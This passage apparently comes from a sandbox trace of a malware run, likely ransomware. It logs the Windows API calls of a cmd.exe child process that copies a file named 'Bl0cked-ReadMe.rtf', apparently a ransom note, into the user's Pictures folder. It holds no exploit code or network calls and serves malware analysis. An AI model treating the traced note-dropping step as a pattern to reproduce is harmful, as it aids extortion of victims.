lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x30e8e4*=0x1a) returned 1 [0146.270] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.270] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0146.270] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.270] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0146.270] _get_osfhandle (_FileHandle=0) returned 0x3 [0146.270] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0146.270] SetConsoleInputExeNameW () returned 0x1 [0146.270] GetConsoleOutputCP () returned 0x1b5 [0146.270] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0146.271] SetThreadUILanguage (LangId=0x0) returned 0x409 [0146.271] exit (_Code=0) Process: id = "205" image_name = "cmd.exe" filename 
= "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b80" os_pid = "0xb18" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Pictures\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 17685 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 17686 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 17687 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 17688 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 17689 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 17690 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 17691 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = 
"apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 17692 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 17693 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 17694 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 17749 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 17750 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 17751 start_va = 0x1a0000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17752 start_va = 0x2a0000 end_va = 0x306fff entry_point = 0x2a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 17753 start_va = 0x4a0000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 17754 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 17755 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 17756 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name 
= "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 17757 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 17758 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 17759 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 17760 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 17761 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 17762 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 17763 start_va = 0x310000 end_va = 0x3d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 17764 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 17765 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") 
Region: id = 17766 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 17767 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 17768 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 17769 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 17770 start_va = 0x4b0000 end_va = 0x5b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 17771 start_va = 0x5c0000 end_va = 0x11bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 17772 start_va = 0x11c0000 end_va = 0x1322fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011c0000" filename = "" Thread: id = 260 os_tid = 0xa9c [0146.065] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fc5c | out: lpSystemTimeAsFileTime=0x16fc5c*(dwLowDateTime=0x90fea060, dwHighDateTime=0x1d440a9)) [0146.065] GetCurrentProcessId () returned 0xb18 [0146.065] GetCurrentThreadId () returned 0xa9c [0146.065] GetTickCount () returned 0x2d779 [0146.065] QueryPerformanceCounter (in: lpPerformanceCount=0x16fc54 | out: lpPerformanceCount=0x16fc54*=20285455738) returned 1 [0146.066] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0146.066] __set_app_type (_Type=0x1) [0146.066] __p__fmode () returned 0x76b331f4 [0146.066] __p__commode () returned 0x76b331fc [0146.066] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0146.066] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, 
_Env=0x4a9e423c) returned 0 [0146.067] GetCurrentThreadId () returned 0xa9c [0146.067] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa9c) returned 0x38 [0146.067] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0146.067] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0146.067] SetThreadUILanguage (LangId=0x0) returned 0x409 [0146.067] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0146.067] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16fbec | out: phkResult=0x16fbec*=0x0) returned 0x2 [0146.067] VirtualQuery (in: lpAddress=0x16fc23, lpBuffer=0x16fbbc, dwLength=0x1c | out: lpBuffer=0x16fbbc*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0146.067] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16fbbc, dwLength=0x1c | out: lpBuffer=0x16fbbc*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0146.067] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16fbbc, dwLength=0x1c | out: lpBuffer=0x16fbbc*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0146.067] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16fbbc, dwLength=0x1c | out: lpBuffer=0x16fbbc*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0146.067] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16fbbc, dwLength=0x1c | out: lpBuffer=0x16fbbc*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) 
returned 0x1c [0146.067] GetConsoleOutputCP () returned 0x1b5 [0146.067] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0146.068] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0146.068] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.068] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0146.068] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.068] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0146.068] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.068] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0146.068] _get_osfhandle (_FileHandle=0) returned 0x3 [0146.068] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0146.068] _get_osfhandle (_FileHandle=0) returned 0x3 [0146.069] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0146.069] GetEnvironmentStringsW () returned 0x1b0168* [0146.069] FreeEnvironmentStringsW (penv=0x1b0168) returned 1 [0146.069] GetEnvironmentStringsW () returned 0x1b0168* [0146.069] FreeEnvironmentStringsW (penv=0x1b0168) returned 1 [0146.069] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16eb5c | out: phkResult=0x16eb5c*=0x40) returned 0x0 [0146.069] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16eb64, lpData=0x16eb68, lpcbData=0x16eb60*=0x1000 | out: lpType=0x16eb64*=0x0, lpData=0x16eb68*=0x90, lpcbData=0x16eb60*=0x1000) returned 0x2 [0146.069] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16eb64, lpData=0x16eb68, lpcbData=0x16eb60*=0x1000 | out: lpType=0x16eb64*=0x4, lpData=0x16eb68*=0x1, lpcbData=0x16eb60*=0x4) returned 0x0 [0146.069] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16eb64, lpData=0x16eb68, 
lpcbData=0x16eb60*=0x1000 | out: lpType=0x16eb64*=0x0, lpData=0x16eb68*=0x1, lpcbData=0x16eb60*=0x1000) returned 0x2 [0146.069] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16eb64, lpData=0x16eb68, lpcbData=0x16eb60*=0x1000 | out: lpType=0x16eb64*=0x4, lpData=0x16eb68*=0x0, lpcbData=0x16eb60*=0x4) returned 0x0 [0146.069] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16eb64, lpData=0x16eb68, lpcbData=0x16eb60*=0x1000 | out: lpType=0x16eb64*=0x4, lpData=0x16eb68*=0x40, lpcbData=0x16eb60*=0x4) returned 0x0 [0146.069] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16eb64, lpData=0x16eb68, lpcbData=0x16eb60*=0x1000 | out: lpType=0x16eb64*=0x4, lpData=0x16eb68*=0x40, lpcbData=0x16eb60*=0x4) returned 0x0 [0146.070] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16eb64, lpData=0x16eb68, lpcbData=0x16eb60*=0x1000 | out: lpType=0x16eb64*=0x0, lpData=0x16eb68*=0x40, lpcbData=0x16eb60*=0x1000) returned 0x2 [0146.070] RegCloseKey (hKey=0x40) returned 0x0 [0146.070] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16eb5c | out: phkResult=0x16eb5c*=0x40) returned 0x0 [0146.070] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16eb64, lpData=0x16eb68, lpcbData=0x16eb60*=0x1000 | out: lpType=0x16eb64*=0x0, lpData=0x16eb68*=0x40, lpcbData=0x16eb60*=0x1000) returned 0x2 [0146.070] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16eb64, lpData=0x16eb68, lpcbData=0x16eb60*=0x1000 | out: lpType=0x16eb64*=0x4, lpData=0x16eb68*=0x1, lpcbData=0x16eb60*=0x4) returned 0x0 [0146.070] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16eb64, lpData=0x16eb68, lpcbData=0x16eb60*=0x1000 | out: lpType=0x16eb64*=0x0, 
lpData=0x16eb68*=0x1, lpcbData=0x16eb60*=0x1000) returned 0x2 [0146.070] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16eb64, lpData=0x16eb68, lpcbData=0x16eb60*=0x1000 | out: lpType=0x16eb64*=0x4, lpData=0x16eb68*=0x0, lpcbData=0x16eb60*=0x4) returned 0x0 [0146.070] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16eb64, lpData=0x16eb68, lpcbData=0x16eb60*=0x1000 | out: lpType=0x16eb64*=0x4, lpData=0x16eb68*=0x9, lpcbData=0x16eb60*=0x4) returned 0x0 [0146.070] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16eb64, lpData=0x16eb68, lpcbData=0x16eb60*=0x1000 | out: lpType=0x16eb64*=0x4, lpData=0x16eb68*=0x9, lpcbData=0x16eb60*=0x4) returned 0x0 [0146.070] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16eb64, lpData=0x16eb68, lpcbData=0x16eb60*=0x1000 | out: lpType=0x16eb64*=0x0, lpData=0x16eb68*=0x9, lpcbData=0x16eb60*=0x1000) returned 0x2 [0146.070] RegCloseKey (hKey=0x40) returned 0x0 [0146.070] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886374 [0146.070] srand (_Seed=0x5b886374) [0146.070] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Pictures\\Bl0cked-ReadMe.rtf\"" [0146.070] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Pictures\\Bl0cked-ReadMe.rtf\"" [0146.070] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0146.071] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b18c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0146.071] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0146.071] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0146.071] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0146.071] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0146.071] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0146.071] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0146.071] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0146.071] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0146.071] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0146.071] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0146.071] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0146.071] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0146.071] GetEnvironmentStringsW () returned 0x1b22b8* [0146.071] FreeEnvironmentStringsW (penv=0x1b22b8) returned 1 [0146.071] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0146.072] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0146.072] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0146.072] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0146.072] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0146.072] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0146.072] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0146.072] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0146.072] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 
[0146.072] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0146.072] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16f928 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0146.072] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x16f928, lpFilePart=0x16f924 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16f924*="Desktop") returned 0x18 [0146.072] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0146.072] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f6a4 | out: lpFindFileData=0x16f6a4) returned 0x1afff8 [0146.072] FindClose (in: hFindFile=0x1afff8 | out: hFindFile=0x1afff8) returned 1 [0146.072] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x16f6a4 | out: lpFindFileData=0x16f6a4) returned 0x1afff8 [0146.073] FindClose (in: hFindFile=0x1afff8 | out: hFindFile=0x1afff8) returned 1 [0146.073] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x16f6a4 | out: lpFindFileData=0x16f6a4) returned 0x1afff8 [0146.073] FindClose (in: hFindFile=0x1afff8 | out: hFindFile=0x1afff8) returned 1 [0146.073] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0146.073] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0146.073] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0146.073] GetEnvironmentStringsW () returned 0x1b2ad8* [0146.073] FreeEnvironmentStringsW (penv=0x1b2ad8) returned 1 [0146.073] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0146.074] GetConsoleOutputCP () returned 0x1b5 [0146.074] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) 
returned 1 [0146.074] GetUserDefaultLCID () returned 0x409 [0146.075] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0146.075] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16fa68, cchData=128 | out: lpLCData="0") returned 2 [0146.075] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16fa68, cchData=128 | out: lpLCData="0") returned 2 [0146.075] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16fa68, cchData=128 | out: lpLCData="1") returned 2 [0146.075] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0146.075] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0146.075] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0146.075] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0146.075] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0146.075] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0146.075] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0146.075] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0146.075] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0146.075] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0146.075] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0146.076] GetConsoleTitleW (in: lpConsoleTitle=0x1a08d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b 
[0146.076] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0146.076] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0146.077] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0146.077] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0146.077] _wcsicmp (_String1="type", _String2=")") returned 75 [0146.077] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0146.077] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0146.077] _wcsicmp (_String1="IF", _String2="type") returned -11 [0146.077] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0146.078] _wcsicmp (_String1="REM", _String2="type") returned -2 [0146.078] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0146.082] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.082] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.082] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.082] GetFileType (hFile=0x7) returned 0x2 [0146.275] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0146.275] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f960 | out: lpMode=0x16f960) returned 1 [0146.275] _dup (_FileHandle=1) returned 3 [0146.275] _close (_FileHandle=1) returned 0 [0146.275] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\Pictures\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0146.275] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\pictures\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x16f930, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0146.277] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0146.277] GetConsoleTitleW (in: lpConsoleTitle=0x16f760, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0146.277] _wcsicmp (_String1="type", _String2="DIR") 
returned 16 [0146.277] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0146.277] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0146.277] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0146.278] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0146.278] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x16f2c4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16f2c4) returned 0x1a0e50 [0146.278] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0146.278] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0146.278] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0146.279] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x16e1d0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0146.279] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0146.279] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.279] GetFileType (hFile=0x54) returned 0x1 [0146.279] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.279] GetFileSize (in: hFile=0x54, 